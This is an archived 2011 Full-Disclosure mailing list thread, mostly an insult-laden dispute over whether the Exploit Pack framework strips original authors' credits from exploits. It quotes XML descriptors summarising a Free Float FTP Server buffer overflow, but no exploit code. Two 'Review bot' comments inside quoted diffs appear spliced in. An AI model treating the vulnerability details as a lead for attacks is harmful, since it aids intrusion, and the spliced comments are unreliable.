> > your infos up, for really, no reason. as they did.
> > Law abiding or not, then they should be advertising as a law abiding
> > company, and not acting like some hackers-paradise vpn service.
> > xd
> >
> >
> > On 4 October 2011 06:16, Ferenc Kovacs  wrote:
> >>
> >> On Mon, Oct 3, 2011 at 10:35 PM, Laurelai 
> wrote:
> >> > On 10/3/2011 10:42 AM, Antony widmal wrote:
> >> >> Using an external VPN provider to cover your trace clearly shows your
> >> >> incompetency and your idiot assumption.
> >> >> Trying to blame the VPN provider rather than accepting your mistake
> >> >> and learning from it clearly show your 3 years old mentality.
> >> >>
> >> >> Also, could you please stop posting as GLOW Xd as well ?
> >> >> We do not need your schizophrenic script kiddie "lolololol", "xD",
> >> >> hugs,  spamming on this mailing list.
> >> >>
> >> >> You being on this mailing list is once again not the best idea.
> >> >>
> >> >> Thanks,
> >> >> Antony
> >> > Actually XD and me are two different people. Second issues of privacy
> >> > are always relevant, not understanding that law abiding individuals
> >> > should always be concerned about companies that hand over personal
> info
> >> > at the request of an authority figure are the ones with three year old
> >> > mentalities.
> >>
> >> maybe they are law abiding companies? :)
> >> this whole fuss wouldn't have happened, if everybody could just stay a
> >> law abiding citizen.
> >>
> >> --
> >> Ferenc Kovács
> >> @Tyr43l - http://tyrael.hu
> >>
> >
>
>
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
>

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
Don't be angry about it, but, you could at least give credit to those, you're
paying a whole 2$ to, or even if NOT paid, you should leave AUTHOR name
INSIDE the exploit, maybe that's why it is being molested ?
GPL is fine, but, you are seen as a bad dude, simply coz you don't give
simple credit, and rather, add a patch for the thing to remove the author, i
mean, why not let ppl at least see authors nickname/name.. it is not
nice to those who put in their time, to help YOUR project, for whatever
reasons, and, i love github, and, this has nothing to do with github, but, i
am saying, you should never rename stuff, just take a look at 1337day.com,
or , is that yours also ;p
have a lovely day, i will look at the project, if i think it is decent, i
would even buy, a pirated version... etc...etc... you know how it is, one
copy's out, 100 copies is really outtt ;)
its all good bro, keep up the good work, just leave authors names maybe,
remove email is fine, but you should leave author name, so ppl know maybe,
which things will be better/more reliable code, or stabler code, perhaps,
than other authors... or, is that wrong to assume... i sure, would not like
to see some code i have written, on there, without at least saying #Thanks to
xd for this one.
it is one line dude.
take it easy, don't flame up.
xd


On 6 October 2011 09:04, Juan Sacco  wrote:

> As you might know, or not know, Exploit Pack is working without any
> foundation, company, government and money-giving guy.
> There is no professional coder, programmer that is paid to develop this
> program.
>
> I have tried to ensure that the name of the exploit author is seen in all
> the software. It was my bad pasting the license there, but hey! I'm human give
> me a break you troll.
>
> The next time would be better if you post it in the right place, GitHub.
>
> And in fact you're trying to blame here.
>
> Exploit Pack is licensed GPL let me copy & paste the 4 freedoms. I hope to
> do it well this time.
>
> The freedom to run the program, for any purpose (freedom 0).
> The freedom to study how the program works, and change it so it does your
> computing as you wish (freedom 1). Access to the source code is a
> precondition for this.
> The freedom to redistribute copies so you can help your neighbor (freedom
> 2).
> The freedom to distribute copies of your modified versions to others
> (freedom 3). By doing this you can give the whole community a chance to
> benefit from your changes. Access to the source code is a precondition for
> this.
>
> Let me ask you why you are spending so much time annoying this GPL
> software?
>
> I hope next time get a patch of code from you and no nonsense again.
>
> Like I said to lroot. The same goes for YOU. If you want the right to
> demand certain things from the program, then go BUY a program and do not
> harass people who are writing software for free, or go and help the
> developers by writing the functionality yourself.
>
> Juan Sacco
>
> On Wed, Oct 5, 2011 at 6:36 PM, xD 0x41  wrote:
>
>> wow i was not going to comment on that pack and have not yet looked but,
>> thats plain nasty... to remove a simple credit line, i mean it is not full
>> of greetz etc :s and replace... totally pathetic.
>>
>>
>>
>> On 5 October 2011 20:32, root  wrote:
>>
>>> - * @author Stefan Zeiger (szei...@novocode.com)
>>> - print "   Written by Blake  "
>>> - 
>>>
>>> +#Exploit Pack - Security Framework for Exploit Developers
>>> +#Copyright 2011 Juan Sacco http://exploitpack.com
>>> +#
>>> +#This program is free software: you can redistribute it and/or modify
>>> it under the terms of the
>>> +#GNU General Public License as published by the Free Software
>>> Foundation, either version 3
>>> +#or any later version.
>>> +#
>>> +#This program is distributed in the hope that it will be useful, but
>>> WITHOUT ANY WARRANTY;
>>> +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
>>> PARTICULAR
>>> +#PURPOSE. See the GNU General Public License for more details.
>>> +#
>>> +#You should have received a copy of the GNU General Public License
>>> along with this program.
>>> +#If not, see http://www.gnu.org/licenses/
>>>
>>>
>>>
>>> Ys why not?
>>>

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
Heya jeff,
The author is clearly not smart.
He is copying other codes, this is a plain rip off of canvas...hehe... and
same with his insect pro... he stole metasploit for that one, then he wants
respect, when we see him removing simply one line which would at least say a
ty and, show ppl who writes, is maybe sometimes stabler than other authors,
it would be better to have this in, not out.. he should be able to see that's
how it works with exploit code/pocs in general... sometimes, if i see php
code from one person, i will tend to look, but if it was from an unknown
person, i prolly wouldn't.
But this (open sauce) project, i will download and waste 5minutes on.
Then i'll go back to Backbox and BT5 and things which work :)
hehe
(this guy is really mad about his app... and i mean, dang mad angry! I will
buy some tissues and send to him, that is my donation for his app)
:))
xd


On 6 October 2011 08:59, Jeffrey Walton  wrote:

> On Wed, Oct 5, 2011 at 5:32 AM, root  wrote:
> > - * @author Stefan Zeiger (szei...@novocode.com)
> > - print "   Written by Blake  "
> > - 
> >
> > +#Exploit Pack - Security Framework for Exploit Developers
> > +#Copyright 2011 Juan Sacco http://exploitpack.com
> > +#
> > +#This program is free software: you can redistribute it and/or modify
> > it under the terms of the
> > +#GNU General Public License as published by the Free Software
> > Foundation, either version 3
> > +#or any later version.
> > +#
> > +#This program is distributed in the hope that it will be useful, but
> > WITHOUT ANY WARRANTY;
> > +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> > PARTICULAR
> > +#PURPOSE. See the GNU General Public License for more details.
> > +#
> > +#You should have received a copy of the GNU General Public License
> > along with this program.
> > +#If not, see http://www.gnu.org/licenses/
> GPL V3 - they had to encumber it to set it free?
>

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
i know eh, coders dream :P
It's only 2bux per sploit you add.. so even from PoC code, to scanner, wow!
That's a bargain, a day code per scanner, unfortunately tho this is good
money for some countries, and people, and that's who the targets are for
this.. lower level skilled coders... nasty .


On 6 October 2011 10:15, root  wrote:

> On 10/05/2011 06:39 PM, xD 0x41 wrote:
> > You will inmediately recieve $2 (US Dollars) in your PayPal account for
> > each approved exploit.
> >
> >
> > This is IT dream, 2bux for one 0day or, 100 = 200bux :P
>
> I have verified your calculations.
>

Re: [Full-disclosure] Full-Disclosure - sick of your nonsense

2011-10-05 Thread xD 0x41
Starting fights... because i dislike one product, and question ITsec... is
hardly what you're trying to make me out to be.
Think, and do as you like.
cheers.
xd


On 6 October 2011 10:31, Sam Goody  wrote:

> Dude, I think many people including myself are sick of your
> nonsense on top of trying to provoke fights on full-disc.
>
> This list is not for chatting and 90% of what you've written is
> subpar.
>
> Please keep the nonsense to yourself. You will now be added to the
> n3td3v e-mail black list.
>
> Cheers!

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
Juan,
I have not created any opinion (yet) but, is it really fair, to give people
who code, 2 frigging dollars, for sometimes what would be 0day, or is it
nice, to remove the REAL author's name, and add your own.
That's the only gripe i see, without having to look at it yet.
The whole look of it, without 'using' it tho, looks a lot like canvas ;p but,
that's not bad thing and, i personally, don't mind that, coz canvas, is not
open and, this one is, which would be great to bring that feel into it.. so,
you're reading too much into things, when i mean giving credit to author, i don't
mean putting in his email/greetings and notes, i mean, simply one line to
give credit, so people who are using the pack, could at least feel sure with
some coders, that the code will be very nice, and not painful to read or,
modify even to make it nicer.. that is why i like to always make sure authors
get some credit, however it may be, it only need be a nick/name, but you are
using their things, but on your people who you're paying, i guess you should
maybe put in place then rules that, all exploits paid for, would not receive
credits, other than, part of devteam or part of exploit-pack codepack.
It ain't hard to keep people happy. Whilst still producing quality, or, non
quality.
i will run your pack, using ONE well known exploit, and if that fails, i will
have results here, compared to backbox scan or, another vuln scan, then, i
will comment further. How does that sound?
Ok. I will do my research, but, i ain't angry at you, nor the product, altho
i dislike Insect, this one, seems to have some good features. So yea, i'll
take an open look, i only think, if code is NOT paid for, then you should
put author's name or handle in there somewhere, maybe even something for paid
exploits... people do appreciate a 'thanks to' sometimes... especially you
it seems.
xd


On 6 October 2011 10:47, Juan Sacco  wrote:

> Hey,
> Its really a shame that you didn't even take like 2 minutes to watch the
> source code of Exploit Pack before create an opinion.
> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
> JAVA. See the diference? Also, please take a look at the interface design,
> both are really different. Show me where Exploit Pack is similar to Canvas!
> I think you spent too much time looking for Waldo :-D
>
> We respect the exploit author and that is why I add them at the first line
> of the XML file
> You should run the program before creating this crappy post with your
> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )
>
> Take a look if you want:
>
> 
> 
>
>  Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" 
> ShellcodeAvailable="R" ShellPort="" SpecialArgs="">
> 
>
> 
> Free Float FTP Server USER Command Remote Buffer Overflow Exploit
> when parsing the command 'USR', which leads to a stack based overflow. Also 
> Free Float FTP Server allow remote anonymous login by default
> exploiting these issues could allow an attacker to compromise the 
> application, access or modify data.
> 
>
> JSacco
>
> On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41  wrote:
>
>> Heya jeff,
>> The author is clearly not smart.
>> He is copying other codes, this is a plain rip off of canvas...hehe... and
>> same with his insect pro... he stole metasplit for tht one, then he wants
>> repect, when we see him removing simplly one line wich would atleast say a
>> ty and, show [ppl who writes, is maybe sometimes stabler than other authors,
>> it would be better to have this in, not out.. he should be able to see thats
>> how it works with exploit code/pocs in general... sometimes, if i see php
>> code from one person, i will tend to look, but if it was from an unknown
>> person, i prolly wouldnt.
>> But this (open sauce) project, i will download and waste 5minutes on.
>> Then illm go back to Backbox and BT5 and things wich work :)
>> hehe
>> (this guy is really mad about his app... and i mean, dang mad angry! I
>> will buy some tissues and send to him, that is my donation for his app)
>> :))
>> xd
>>
>>
>> On 6 October 2011 08:59, Jeffrey Walton  wrote:
>>
>>> On Wed, Oct 5, 2011 at 5:32 AM, root  wrote:
>>> > - * @author Stefan Zeiger (szei...@novocode.com)
>>> > - print "   Written by Blake  "
>>> > - >> Vulnerability="N/A">
>>> >
>>> > +#Exploit Pack - Security Framework for Exploit Developers
>>> > +#Copyright 2011 Juan Sacco http://exploitpack.com
>>> > +#
>>>

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41

Free Float FTP Server USER Command Remote Buffer Overflow Exploit
when parsing the command 'USR', which leads to a stack based overflow.
Also Free Float FTP Server allow remote anonymous login by default
exploiting these issues could allow an attacker to compromise the
application, access or modify data.



erm, sorry this don't count, it should be IN the code, not, after running it :P
that's bs mate, and i won't agree with your crap, until you see my point
really. It is, something you write, compared to running the GUI..
xd



On 6 October 2011 10:47, Juan Sacco  wrote:

> Hey,
> Its really a shame that you didn't even take like 2 minutes to watch the
> source code of Exploit Pack before create an opinion.
> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
> JAVA. See the diference? Also, please take a look at the interface design,
> both are really different. Show me where Exploit Pack is similar to Canvas!
> I think you spent too much time looking for Waldo :-D
>
> We respect the exploit author and that is why I add them at the first line
> of the XML file
> You should run the program before creating this crappy post with your
> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )
>
> Take a look if you want:
>
> 
> 
>
>  Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" 
> ShellcodeAvailable="R" ShellPort="" SpecialArgs="">
> 
>
> 
> Free Float FTP Server USER Command Remote Buffer Overflow Exploit
> when parsing the command 'USR', which leads to a stack based overflow. Also 
> Free Float FTP Server allow remote anonymous login by default
> exploiting these issues could allow an attacker to compromise the 
> application, access or modify data.
> 
>
> JSacco
>
> On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41  wrote:
>
>> Heya jeff,
>> The author is clearly not smart.
>> He is copying other codes, this is a plain rip off of canvas...hehe... and
>> same with his insect pro... he stole metasplit for tht one, then he wants
>> repect, when we see him removing simplly one line wich would atleast say a
>> ty and, show [ppl who writes, is maybe sometimes stabler than other authors,
>> it would be better to have this in, not out.. he should be able to see thats
>> how it works with exploit code/pocs in general... sometimes, if i see php
>> code from one person, i will tend to look, but if it was from an unknown
>> person, i prolly wouldnt.
>> But this (open sauce) project, i will download and waste 5minutes on.
>> Then illm go back to Backbox and BT5 and things wich work :)
>> hehe
>> (this guy is really mad about his app... and i mean, dang mad angry! I
>> will buy some tissues and send to him, that is my donation for his app)
>> :))
>> xd
>>
>>
>> On 6 October 2011 08:59, Jeffrey Walton  wrote:
>>
>>> On Wed, Oct 5, 2011 at 5:32 AM, root  wrote:
>>> > - * @author Stefan Zeiger (szei...@novocode.com)
>>> > - print "   Written by Blake  "
>>> > - >> Vulnerability="N/A">
>>> >
>>> > +#Exploit Pack - Security Framework for Exploit Developers
>>> > +#Copyright 2011 Juan Sacco http://exploitpack.com
>>> > +#
>>> > +#This program is free software: you can redistribute it and/or modify
>>> > it under the terms of the
>>> > +#GNU General Public License as published by the Free Software
>>> > Foundation, either version 3
>>> > +#or any later version.
>>> > +#
>>> > +#This program is distributed in the hope that it will be useful, but
>>> > WITHOUT ANY WARRANTY;
>>> > +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
>>> > PARTICULAR
>>> > +#PURPOSE. See the GNU General Public License for more details.
>>> > +#
>>> > +#You should have received a copy of the GNU General Public License
>>> > along with this program.
>>> > +#If not, see http://www.gnu.org/licenses/
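Review bot: the removed lines `@author Stefan Zeiger` and `Written by Blake` are the only author credits visible in this hunk, and the added header puts `Copyright 2011 Juan Sacco` in their place with no line carrying those names forward. Keep the original credit lines below the new GPL header so each file still records who wrote it; the GPL notice can be added without deleting them.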
>>> GPL V3 - they had to encumber it to set it free?
>
>
>
> --
> _
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5 was released stay tunned

Re: [Full-disclosure] Strange Lenovo x121e

2011-10-05 Thread xD 0x41
Hrm this one is tricky, but smells so bad of preuse, specially when you said
this;

* Inside seal on plastic bag also intact, but glue is suboptimal, I
opened the bag without damaging the seal

That's a clear sign of tamperage...that's when they tell you "do not buy" ...
so i wonder :s
I know it could be any -THINK pad/box, but i also know that Lenovo did buy
IBM boxes, which still bore the seal of IBM and IBM hardware, then i believe
when Lenovo started pumping these out (i have about 6 of the P4 dual-cpu
ex-demos here), i saw on a complete wipe i did, nothing, no files left, and
these are actually lenovos, disguised as IBM, or, so it should be according
to the dates.. IBM name must be able to be used also on lenovo products, i
just wiped 4 IBM which were only one yr old, and they seem clean :s, so, i
went thru fdisk etc, nothing weird...
Is it perhaps something being leftover, from some badly warezd ISO Windows
install...which can lay dormant, even after a format but, not after fdisk
usually... strange, i cannot figure this one.
It smells of pre-use, or ex-demo, but, i have got, 3 ibm netvista 2cpu
boxes, 1 3.3gig awesome IBM thinkcentre, fastest box i have as in loading/swap
access, and IBM Blade, IBM laptop, and not one has those files...i even paid
for ex-demo on the laptop, and it was installed...
i can only see *no* good reason for .exe to be on the drive, after a sale.
It should have always been wiped/fdisk/shredded, as I know i have had done
with the ex demos i have here, and, they are part lenovo and part IBM and
still, not one of those files exists on any box, and the laptop which, i
thought would for sure have something, if any of them did... but nope.
I don't know this one, but, i will try and ask a friend who works with IBM
and see their practices, and try get his own quotes.
Anyhow, cheers.
xd


On 6 October 2011 10:49, halfdog  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> xD 0x41 wrote:
> > Looks like a pre used box... specially with that name, am assuming
> > THINK (thinkcentre/thinkpad - ibm) so in there it might be preused
> > IBM/Lenovo, but strange those files..should never be on the hd on a
> > clean sale.
>
> Pre-use is strange:
> * Cardbox says: manufactured 2011-08-04
> * Cardbox seems authentic (YUEN FOONG YU PAPER SHANGHAI PLANT CO., LTD.)
> * Thinkpad sticky plastic tape could not be removed without cardbox
> surface damage, was not damaged before opening
> * Inside seal on plastic bag also intact, but glue is suboptimal, I
> opened the bag without damaging the seal
> * Bought in Austria 2011-09-23, seems that those machines were already
> on stock for some days.
>
> So 50 days with shipping (15000km oversea?) seems quite narrow for
> pre-use, but one can never known ...
>
> Also nice: Power on hours: 15 (now its 1:20, I started 18:30, so I
> should have caused about 7h power-on time). How long would factory
> equipment take to put 320GB image on SATA?
>
> hd
>
> - --
> http://www.halfdog.net/
> PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFOjOz0xFmThv7tq+4RAqyaAKCFXDwhdMI/d30rfC+S6LF+gM8rewCfQ78+
> izSYcM/+I1yGiMsZOzwpli8=
> =HeZg
> -END PGP SIGNATURE-

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
Juan,


why lie dude, i looked at your github LATEST pull/commit, what is this then

Exploit Pack/exploits/Free Float FTP Server - copia.xml

   - View file @
e17cc4d<https://github.com/exploitpack/trunk/blob/e17cc4d5ee893ce93d2e56deccd7595e944210ee/Exploit%20Pack/exploits/Free%20Float%20FTP%20Server%20-%20copia.xml>

 @@ -1,17 +0,0 @@

  -

  -

  -

  -

  -

  -

  -

  -Free Float FTP Server USER Command Remote Buffer Overflow Exploit

  -when parsing the command 'USR', which leads to a stack based
overflow. Also Free Float FTP Server allow remote anonymous login by
default

  -exploiting these issues could allow an attacker to compromise the
application, access or modify data.

  -

  -

  -

  -Microsoft Windows XP SP2 - Microsoft Windows XP SP3

  -

  -

  -
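
Review bot: the header `@@ -1,17 +0,0 @@` makes this a whole-file deletion of `Free Float FTP Server - copia.xml`, so on its own the hunk cannot show whether an author credit was dropped from the pack. The `- copia` suffix suggests a duplicate file; the commit should state that the original descriptor stays in the tree and still names the exploit author. Most of the 17 removed lines appear empty in this excerpt, so the claim should be checked against the file at e17cc4d rather than against the lines as pasted here.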

exposed! and it is rubbish.
5 exploits, i even pointed him, (in pvt) to a million py files he can now
deface... and he acting like, he's all for the author being in the
sploit..right..ye.. and nice use of xml ...

this is worse thing, i have seen, i have seen better made bash exploit
packs.
sorry, again your stuff is a complete fail.
not even the main exploits, who the heck cares about ftpds like, 10 students
use.. you are maybe in need of guidance, which, i doubt anyone will give
after these lies you're pulling... telling ppl, you're doing the RIGHT thing,
when your git pull says different!
i also have a github, and understand how it works,. so stop trying to
stooge people dude, your stuff sux.
and when i tried to separate links, into different downloads, like your
download page specifies.. it does not work and always gives the base, which
is linux. only. i believe...unless some, small tweaking/batfile made for
win32..but, you advertise the win32 binaries..so, you're just fake.

pls explain..why you're acting like, i am a liar, when, you're removing the
author, from even the exploits now... cheeky, and very rude to me personally.
screw u and ur pathetic crap, open or closed,it is a waste of time.
xd



On 6 October 2011 10:47, Juan Sacco  wrote:

> Hey,
> Its really a shame that you didn't even take like 2 minutes to watch the
> source code of Exploit Pack before create an opinion.
> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
> JAVA. See the diference? Also, please take a look at the interface design,
> both are really different. Show me where Exploit Pack is similar to Canvas!
> I think you spent too much time looking for Waldo :-D
>
> We respect the exploit author and that is why I add them at the first line
> of the XML file
> You should run the program before creating this crappy post with your
> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )
>
> Take a look if you want:
>
> 
> 
>
>  Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" 
> ShellcodeAvailable="R" ShellPort="" SpecialArgs="">
> 
>
> 
> Free Float FTP Server USER Command Remote Buffer Overflow Exploit
> when parsing the command 'USR', which leads to a stack based overflow. Also 
> Free Float FTP Server allow remote anonymous login by default
> exploiting these issues could allow an attacker to compromise the 
> application, access or modify data.
> 
>
> JSacco
>
> On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41  wrote:
>
>> Heya jeff,
>> The author is clearly not smart.
>> He is copying other codes, this is a plain rip off of canvas...hehe... and
>> same with his insect pro... he stole metasplit for tht one, then he wants
>> repect, when we see him removing simplly one line wich would atleast say a
>> ty and, show [ppl who writes, is maybe sometimes stabler than other authors,
>> it would be better to have this in, not out.. he should be able to see thats
>> how it works with exploit code/pocs in general... sometimes, if i see php
>> code from one person, i will tend to look, but if it was from an unknown
>> person, i prolly wouldnt.
>> But this (open sauce) project, i will download and waste 5minutes on.
>> Then illm go back to Backbox and BT5 and things wich work :)
>> hehe
>> (this guy is really mad about his app... and i mean, dang mad angry! I
>> will buy some tissues and send to him, that is my donation for his app)
>> :))
>> xd
>>
>>
>> On 6 October 2011 08:59, Jeffrey Walton  wrote:
>>
>>> On Wed, Oct 5, 2011 at 5:32 AM, root  wrote:
>>> > - * @author Stefan Zeiger (szei...@novocode.com)
>>> > - print "   Written by Blake  "
>>> > - >> Vulnerability="N/A">
>>> >
>>> > +#Exploit Pack - Secur

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
as i said again stop the lies.

Take a look if you want:








Free Float FTP Server USER Command Remote Buffer Overflow Exploit
when parsing the command 'USR', which leads to a stack based overflow.
Also Free Float FTP Server allow remote anonymous login by default
exploiting these issues could allow an attacker to compromise the
application, access or modify data.


JSacco

I did, and i also looked at your git src too.
screw u and the pack,. until it is pro, i won't b near it, and, it won't EVER
b pro, with YOU runnin it,. who will give u GOOD stuff, for 2bux.. fool.
and you dare lie, anyone can check what i just saw, and, that's him, plain
out lying about his stuff, instead of just, admitting, "ok well, it is new,
and, could be, fixed a little..any suggestions are welcome..."

as, i did give him already one in PM... but now, pfft. stop ccing me pls.
xd




On 6 October 2011 11:16, Juan Sacco  wrote:

> Hey.. I already gave you an answer about this.
>
> AGAIN. For the last time.
> I respect the author's name of all the exploits added to Exploit Pack, like
> you suggest in a terrible and way.. Insulting and posting like 10 mail to
> the this list. I will add a " # Thank you [AUTHOR NAME ] for let us use your
> public script " in the top of all new exploit added to Exploit Pack
> Framework.
>
> ** Also, I created a mailing list to discuss this kind of things, report
> bugs and much more ( But sorry, NO INSULTING is allowed there )  **
>
> As other people told you stop doing chatting here. This is not a forum.
>
> JSacco
>
> On Wed, Oct 5, 2011 at 8:57 PM, xD 0x41  wrote:
>
>> 
>> Free Float FTP Server USER Command Remote Buffer Overflow Exploit
>> when parsing the command 'USR', which leads to a stack based overflow. Also 
>> Free Float FTP Server allow remote anonymous login by default
>> exploiting these issues could allow an attacker to compromise the 
>> application, access or modify data.
>> 
>>
>>
>> erm, sorry this dont count, it should be IN the code, not, after running it 
>> :P
>> thats bs mate, and i wont agree with your crap, until you see my point 
>> really. It is, something you write, compared to running thwe GUI..
>>
>>
>> xd
>>
>>
>>
>> On 6 October 2011 10:47, Juan Sacco  wrote:
>>
>>> Hey,
>>> Its really a shame that you didn't even take like 2 minutes to watch the
>>> source code of Exploit Pack before create an opinion.
>>> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
>>> JAVA. See the diference? Also, please take a look at the interface design,
>>> both are really different. Show me where Exploit Pack is similar to Canvas!
>>> I think you spent too much time looking for Waldo :-D
>>>
>>> We respect the exploit author and that is why I add them at the first
>>> line of the XML file
>>> You should run the program before creating this crappy post with your
>>> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
>>> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )
>>>
>>> Take a look if you want:
>>>
>>> 
>>> 
>>>
>>> >> Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" 
>>> ShellcodeAvailable="R" ShellPort="" SpecialArgs="">
>>> 
>>>
>>> 
>>> Free Float FTP Server USER Command Remote Buffer Overflow Exploit
>>> when parsing the command 'USR', which leads to a stack based overflow. Also 
>>> Free Float FTP Server allow remote anonymous login by default
>>> exploiting these issues could allow an attacker to compromise the 
>>> application, access or modify data.
>>> 
>>>
>>> JSacco
>>>
>>> On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41  wrote:
>>>
>>>> Heya jeff,
>>>> The author is clearly not smart.
>>>> He is copying other codes, this is a plain rip off of canvas...hehe...
>>>> and same with his insect pro... he stole metasplit for tht one, then he
>>>> wants repect, when we see him removing simplly one line wich would atleast
>>>> say a ty and, show [ppl who writes, is maybe sometimes stabler than other
>>>> authors, it would be better to have this in, not out.. he should be able to
>>>> see thats how it works with exploit code/pocs in general... sometimes, if i
>>>> see php code from one person, i will tend to look, but if it was from an
>>&

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
OK, now that is out of way, i would be very happy to help, and contribute
even, and will join that list, i don't have address offhand, but i will look
for it if i have to,...and, i will suggest things there, and, i am not
nasty, I just, respect authors.
I appreciate this change..and, i understand, the project, is still young.

AGAIN. For the last time.
I respect the author's name of all the exploits added to Exploit Pack, like
you suggest in a terrible and way.. Insulting and posting like 10 mail to
the this list. I will add a " # Thank you [AUTHOR NAME ] for let us use your
public script " in the top of all new exploit added to Exploit Pack
Framework.

I thank you for this, and this would be nice if it was somehow, incorporated
into the exploit-name, but, i understand this is harder..but some coders,
their work is always amazing, those guys, would definitely deserve it..
but, that's totally something, i will leave to you.
i will even try and, assist the project when i have time, since you are also
trying to work with things.
I want this clear, there is no spite/hate here, it is simply new, and needs
like all new things, debugging a little :)
it is, good start.
xd




On 6 October 2011 11:16, Juan Sacco  wrote:

> Hey.. I already gave you an answer about this.
>
> AGAIN. For the last time.
> I respect the author's name of all the exploits added to Exploit Pack, like
> you suggest in a terrible and way.. Insulting and posting like 10 mail to
> the this list. I will add a " # Thank you [AUTHOR NAME ] for let us use your
> public script " in the top of all new exploit added to Exploit Pack
> Framework.
>
> ** Also, I created a mailing list to discuss this kind of things, report
> bugs and much more ( But sorry, NO INSULTING is allowed there )  **
>
> As other people told you stop doing chatting here. This is not a forum.
>
> JSacco
>
> On Wed, Oct 5, 2011 at 8:57 PM, xD 0x41  wrote:
>
>> 
>> Free Float FTP Server USER Command Remote Buffer Overflow Exploit
>> when parsing the command 'USR', which leads to a stack based overflow. Also 
>> Free Float FTP Server allow remote anonymous login by default
>> exploiting these issues could allow an attacker to compromise the 
>> application, access or modify data.
>> 
>>
>>
>> erm, sorry this dont count, it should be IN the code, not, after running it 
>> :P
>> thats bs mate, and i wont agree with your crap, until you see my point 
>> really. It is, something you write, compared to running thwe GUI..
>>
>>
>> xd
>>
>>
>>
>> On 6 October 2011 10:47, Juan Sacco  wrote:
>>
>>> Hey,
>>> Its really a shame that you didn't even take like 2 minutes to watch the
>>> source code of Exploit Pack before create an opinion.
>>> This can't be a copy of CANVAS. Canvas is made on Python. Exploit Pack
>>> JAVA. See the diference? Also, please take a look at the interface design,
>>> both are really different. Show me where Exploit Pack is similar to Canvas!
>>> I think you spent too much time looking for Waldo :-D
>>>
>>> We respect the exploit author and that is why I add them at the first
>>> line of the XML file
>>> You should run the program before creating this crappy post with your
>>> nonsense opinions ( Harassing the free work of others, you wrote lke 5 - 6
>>> insulting posts in like.. 2 minutes?.. Dude go find a girl, come on )
>>>
>>> Take a look if you want:
>>>
>>> 
>>> 
>>>
>>> >> Platform="windows" Service="ftp" Type="remote" RemotePort="21" LocalPort="" 
>>> ShellcodeAvailable="R" ShellPort="" SpecialArgs="">
>>> 
>>>
>>> 
>>> Free Float FTP Server USER Command Remote Buffer Overflow Exploit
>>> when parsing the command 'USR', which leads to a stack based overflow. Also 
>>> Free Float FTP Server allow remote anonymous login by default
>>> exploiting these issues could allow an attacker to compromise the 
>>> application, access or modify data.
>>> 
>>>
>>> JSacco
>>>
>>> On Wed, Oct 5, 2011 at 8:16 PM, xD 0x41  wrote:
>>>
>>>> Heya jeff,
>>>> The author is clearly not smart.
>>>> He is copying other codes, this is a plain rip off of canvas...hehe...
>>>> and same with his insect pro... he stole metasplit for tht one, then he
>>>> wants repect, when we see him removing simplly one line wich would atleast
>>>> say a ty and, show [ppl who writes, is maybe sometimes s

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
Yes, i will join.
http://exploitpack.com/mailing-list

i will try and contribute actually.. i see now why you removed a bit of the
author name but... kinda handy to know it is always same author too ;p but,
we will discuss this on that list :)
i will look forward to trying to make it, a bit nicer ... specially, could
get some friendly help, which would be nice.. that's what it needs, some decent
codes..to be really looked at, and used, then, you would want to get it
added to like BT or BackBox etc...so, i can try help, sure :)
I'm glad you offered that ,.hehe.
cheers,
xd

On 6 October 2011 11:23, Juan Sacco  wrote:

> Hey, Wanna Join? and contribute to a with a GPL Project? Welcome aboard!!!
> ( Please do me a favor and read the license first )
>
> Wanna keep talking about your personal opinion?
>
> Please.. As it was told stop doing it here, this is not a chatroom. We have
> a forum and a mailing list for that.
>
> It would be nice to see you there... Believe me.
>
> I invite you all to the new forum! :-)
> http://exploitpack.com
>
> Cheers!
>
>
> On Wed, Oct 5, 2011 at 8:55 PM, xD 0x41  wrote:
>
>> Juan,
>> I have not created any opinion (yet) but, is it rally fair, to give people
>> who code, 2 frigging dollars, for sometimes what would be 0day , or is it
>> nice, to remove the REAL auithors name, and add your own.
>> Thats the only grips i see, without having to look at it yet.
>> The whole look of it, without 'using' it tho, looks alot like canvas ;p
>> but, thats not bad thing and, i personally, dont mind that, coz canvas, is
>> not open and, this one is, wich would be great to bring that feel into it..
>> so, your reading tomuch into things, when i mean giving credit to author, i
>> dont mean putting in his email/greetings and notes, i mean, simply one line
